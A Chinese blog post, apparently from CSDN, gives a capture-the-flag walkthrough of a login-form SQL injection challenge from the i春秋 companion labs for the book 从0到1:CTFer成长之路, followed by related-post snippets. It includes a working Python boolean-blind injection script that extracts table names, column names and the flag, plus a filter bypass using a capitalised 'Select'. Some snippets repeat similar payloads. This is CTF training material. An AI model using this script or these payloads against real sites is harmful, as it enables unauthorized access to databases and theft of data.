i春秋《从0到1:CTFer成长之路》题目(Web——SQL注入-2)

最新推荐文章于 2022-06-15 16:16:03 发布
最新推荐文章于 2022-06-15 16:16:03 发布
阅读量2k 收藏 5
点赞数
分类专栏: CTF 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LSYZWF/article/details/117136205
版权

文章目录

题目链接:

https://www.ichunqiu.com/battalion?t=1&r=68487

解题思路

1、首先点击login.php,输入进行尝试

输入admin显示账户或者密码错误
在这里插入图片描述

而输入其他显示账号不存在
在这里插入图片描述

这里可以初步猜测用户名就是admin

2、开始尝试是否存在注入

输入admin’,显示账户不存在,而输入admin’#显示账户或密码错误
在这里插入图片描述
这表明存在注入漏洞,并且为字符型漏洞。

3、这里可以判断列字段的个数,但是没有回显此步可以省略

在这里插入图片描述
可以判断为3列

4、由于没有回显,故只能尝试盲注

在盲注之前,根据一些系列测试可以发现此题过滤了select
但是可以大写绕过。

5、抓包分析

在这里插入图片描述
post提交方式,参数如下为:name和pass
正确回显:{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}
在这里插入图片描述
错误回显:{“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"}
在这里插入图片描述
根据不同的回显编写脚本,这里采用布尔盲注,经测试,时间盲注也是可以,但是执行时间较长。

6、编写脚本

import requests

def Get(url):
    result = ''
    for i in range(1,100):
        left = 32
        right = 128
        mid = (left+right)//2
        while left<right:
            #查询表名
            # name = "admin' and if(ascii(mid((Select group_concat(table_name) from information_schema.tables " \
            #        "where table_schema=database()),{0},1))>{1},1,0)#".format(i,mid)

            #查询列名
            # name = "admin' and if(ascii(mid((Select group_concat(column_name) from information_schema.columns " \
            #        "where table_schema=database() and table_name='fl4g'),{0},1))>{1},1,0)#".format(i,mid)

            #根据表名和列名查询字段值
            name = "admin' and if(ascii(mid((Select flag from fl4g),{0},1))>{1},1,0)#".format(i, mid)
            
            data = {"name":name,"pass":"1223234"}
            res = requests.post(url,data)
            if "\\u8d26\\u53f7\\u6216\\u5bc6\\u7801\\u9519\\u8bef" in res.content.decode():
                left = mid+1
            else:
                right = mid
            mid = (left+right)//2
        #查询结果结束
        if mid==32:
            break
        result += chr(mid)
        print(result)
    print(result)

Get('http://eci-2ze7rwkw5ezyr8olv58h.cloudeci1.ichunqiu.com/login.php')

查询表名结果:
在这里插入图片描述
查询列名结果:
在这里插入图片描述
查询相关的值
在这里插入图片描述
得到flag: n1book{login_sqli_is_nice}

DiliLearngent
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《从0到1:CTFer成长SQL注入-2
tr_trTTT的博客
04-13 3266
前言: 我是新手小白,创建此文章只为了记录自己的学习 题目: 我们先进入环境,既然是sql注入,那就可以通过手工或者sqlmap来进行注入 上面就是题目,有登录框,我们先用手工测试sql注入。 手工方法: 1. 随便输入一个账号试试: 输入admin显示账号或密码错误,输入其他显示账号不存在,所以这里可以判断账号是admin; 2.开始判断注入 ...
i春秋《从0到1:CTFer成长题目(Web——afr_1-3)
LSYZWF的博客
05-22 1192
文章目录题目题目链接解题思总结题目题目链接解题思总结题目题目题目链接 https://www.ichunqiu.com/battalion?t=1&r=68487 解题思 1、发现参数p,尝试更改参数p的值 2、发现输入其他字符没有用,也不是SQL注入,尝试输入关键字flag 3、发现可能是文件包含漏洞,由于之前输入的是hello,没有文件后缀,所以可能是进行了后缀拼接 ,尝试给赋值hello.php 发现确实将后缀截断,并且拼接了指定后缀 4、尝试伪协议 http://ec
i春秋CTF-训练营 SQL注入-2 一鱼三吃 sqlmap bp手注 python脚本
AAAAAAAAAAAA66的博客
11-30 471
目录 题目 做题前获取的信息 一鱼三吃 sqlmap burp手注 python自动化脚本 题目 做题前获取的信息 F12查看源码得到提示 依照题目信息,post提交数据。 一鱼三吃 sqlmap 随便输入用户名,密码 提交 burp拦截 右键 Copy to file 文件保存为2.txt 我用的burp是在windows环境下的,所以把2.txt 复制放在kail桌面。(也可以自己在虚拟机创建一个2.txt文件 ,把bp中的数据粘贴到文件中...
CTF 小白教程《从0到1:CTFer成长SQL - 2 解题过程
在下小黄的博客
06-07 2404
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: 小白教程《从0到1:CTFer成长》结题过程 《从0到1:CTFer成长》书籍配套题目,点击即可打开 - 实验环境(i 春秋 需要登录) 微信公众号回复:【CTF】,即可获取本文全部涉及到的工具。 创建时间:2021年5月30日 软件: MindMaster Pro、kali 这里写目录标题CTF中
SQL注入-初入web安全-详细知识图谱
最新发布
11-06
SQL注入初入Web安全详细知识图谱 SQL注入是一种常见的Web应用安全漏洞,指的是攻击者通过构造特殊的输入参数,来改变原始的SQL语句,使得数据库服务器执行恶意的SQL语句,从而达到非法访问或控制数据库的目的。SQL...
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
#简要明确参数类型数字,字符,搜索,JSON 等#简要明确请求方法GET,POST,COOKIE,REQUEST,HTTP 头等其中 SQL 语句干扰符号:',
第16天:WEB漏洞-SQL注入之查询方式及报错盲注1
08-03
Access 偏移注入:解决列名获取不到的情况查看登陆框源代码的表单值或观察 URL 特征等也可以针对表或列获取不到的情况select 查询数据在网站应用中进行
第18天:WEB漏洞-SQL注入之堆叠及WAF绕过注入1
08-03
1、逻辑问题 2、性能问题 3、白名单
第17天:WEB漏洞-SQL注入之二次,加解密,DNS等注入1
08-03
WEB 漏洞-二次,加解密,DNS 等注入#加解密,二次,DNSlog 注入注入原理,演示案例,实际应用(中转注入)DNSlog:解决了盲注不能回显数据,效率低
《从0到1:CTFer成长》书籍配套题目[第一章 web入门]SQL注入
wuyaowangchuan的博客
11-19 2008
这道题没有过滤,超级简单 文章目录手注sqlmap跑 进入环境 手注 b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1' http://b0658771-a130-4835-bb40-f6cca649bccf.node3.buuoj.cn/index.php?id=1%27%20and%201=1%20%23 id=1%27%20and%201=2%20%23 说明是字符型注入 然后开始注入 ?id=1%27.
从0到1的ctfer成长web闯关
qq_52988674的博客
06-24 164
第一关 第一步输入 http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=1‘or 1=1--+ 发现回显正常,判断有sql注入漏洞(--+为注释符号,还有其他的,自行了解) 第二步输入 http://eci-2ze9c1cyly5iyeoqfmq8.cloudeci1.ichunqiu.com/index.php?id=1’order by 10--+ 无回显,这里用二分法10,5,2发现输入2的时候回显正常,在
从0到1的CTF之旅————Web(1)
qq_44373268的博客
06-15 847
今天学习了一下web感觉受益匪浅,小做几道题练练手,纯新手勿喷 ————————————————————————————————————————————第一题:[极客大挑战 2019]EasySQL 首先思考的便是最简单的登录绕过。在逻辑上面,当点击登录按钮后会取你输入框的值与数据库中进行对比。 登录绕过是最基础的,就是要将这句SQL语句给屏蔽掉,进而让此语句的执行结果始终为真。输入下面万能密码 当执行此语句时 ,就会变成` 此时的 1=1 恒为真,在 或 状态下有一个为真则始终为真,此时可绕过登录。得到f
CTF从0-1,web1-1,wp
weixin_45486362的博客
06-15 271
本地成功搭建环境后,访问http://127.0.0.1/得到页面 直接利用dirsearch扫描 python3 dirsearch -u http://127.0.0.1/ -e* 访问http://127.0.0.1/robots.txt 发现目录/flag1_is_her3_fun.txt得到第一段flag 访问http://127.0.0.1/index.php~得到第二段flag 访问http://127.0.0.1/index.php.swp得到第三段flag FLAG:n1book{
ichunqiu Web SQli wp
weixin_45253216的博客
01-11 230
2020.1.10 菜鸡今天又来水题了。 其实这个题,不是很水【狗头】在i春秋平台上看到了一道名为SQli的web题,想到了自己玩过1%的那个靶场也叫sqli-libs,于是手贱的打开了。咋一看还蛮友善的,其实涉及的知识点还蛮多的(自我感觉,毕竟不会的太多了) 本题涉及的知识有: waf fuzz测试 sqli注入fuzz字典 spintf()函数格式化字符串,导致单引号逃逸 实践判断sql注入sqlmap多参数使用 编写利用脚本 如果还有相关知识再做补充,下面开始本题wp。 首先进入题目环境,是一
《从0到1:CTFer成长》书籍配套题目-[第一章 web入门]SQL注入-2
weixin_46703850的博客
02-21 1010
《从0到1:CTFer成长》书籍配套题目,来源网站:[《从0到1:CTFer成长》](https://book.nu1l.com/)
从0到1CTFer成长-第一章-CTF中的SQL注入
黑白的博客
03-01 1912
CTF中的SQL注入 声明 好好向大佬们学习!!! 攻击 https://book.nu1l.com/tasks/#/pages/web/1.2 SQL注入-1 kali执行 vim docker-compose.yml 内容如下 version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 开启docker .
i春秋《从0到1:CTFer成长》通关WP
07-08 4354
1、常见的搜集 题目内容:一共3部分flag 使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描: 打开第一个URL: 发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1 打开第二个URL: 可以得到flag2:s_v3ry_im 打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}: 组合即可得到完整flag:n1book{info_1
CTF学习记录 i春秋 《从0到1:CTFer成长》文件上传
mastergu2的博客
10-21 4187
21.10.19 第二次开始学习CTF 感觉很有收获 至少有让自己忙起来了的感觉 感觉有一些学习状态了 打算重新记录一下学习笔记!加油 我会坚持下去的! 题目代码 首先附上题目的代码段(不完整) show_source(__FILE__); }else{ $file = $_FILES['file']; if(!$file){ exit("请勿上传空文件"); } $name = $file['name']; $dir = 'upload/
从0到1:CTFer成长 sql注入1
07-27
CTFer成长中,SQL注入是一个重要的技术点。SQL注入是一种利用用户输入数据不当,从而欺骗数据库执行恶意操作的攻击方式。在CTF比赛中,了解和掌握SQL注入技术可以帮助你解决一些与数据库相关的题目。 首先,你需要了解SQL注入的原理和基本概念。SQL注入通常发生在应用程序与数据库之间的交互过程中。当应用程序未能正确过滤用户输入数据,并且将用户输入直接拼接到SQL查询语句中时,攻击者可以通过构造恶意输入来修改、删除或绕过原本应该执行的查询操作,从而获取敏感信息或控制数据库。 接下来,你需要学习一些常见的SQL注入技巧和工具。例如,可以使用单引号 `'` 来进行字符串注入,使用注释符 `--` 来注释掉原本的查询语句,使用 UNION 语句来进行查询结果的合并等等。同时,了解一些常见的防御措施,如参数化查询、输入验证和输出编码等,可以帮助你更好地理解和应对SQL注入攻击。 在实践中,你可以尝试挑战一些有关SQL注入的CTF题目。这些题目通常会提供一个具有漏洞的应用程序和一个数据库,你需要通过利用SQL注入漏洞来获取敏感信息或执行特定操作。通过解决这些题目,你可以加深对SQL注入的理解,并且熟悉常见的攻击场景和解决方法。 最后,记得在学习和实践过程中保持合法合规。只在合法授权的情况下进行演练和挑战,切勿用于非法用途。同时,及时更新和修补应用程序的漏洞,以保护自己和他人的信息安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值